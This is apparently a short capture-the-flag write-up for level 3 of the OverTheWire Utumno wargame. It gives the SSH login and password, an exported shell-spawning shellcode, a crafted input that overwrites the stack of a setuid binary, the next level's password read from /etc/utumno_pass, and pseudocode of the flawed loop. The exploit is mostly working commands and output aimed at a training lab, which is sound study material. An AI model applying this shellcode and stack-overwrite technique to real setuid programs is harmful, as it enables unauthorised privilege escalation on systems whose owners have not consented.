# Utumno wargame: Level 3


# ssh utumno3@utumno.labs.overthewire.org
utumno3@utumno.labs.overthewire.org's password:7a757564616669696e65

utumno3@melissa$ file /utumno/utumno3
/utumno/utumno3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno3@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno3@melissa$ (perl -e 'print "\x2c\x77\x2e\xd9\x28\xff\x26\xff" . "\n"x9' ; cat) | /utumno/utumno3
/usr/bin/whoami
utumno4
/bin/cat /etc/utumno_pass/utumno4
6f6f6769656c656f6761
Pseudocode

a = '0'
b = '0'
[begin]
 a = getchar()
 if (a == EOF) | (b > 23) then exit()
 c = xor(a,3*b)
 d = $esp + 32 + c
 [d] = getchar()
 b = b + 1
 jump to [begin]

No comments: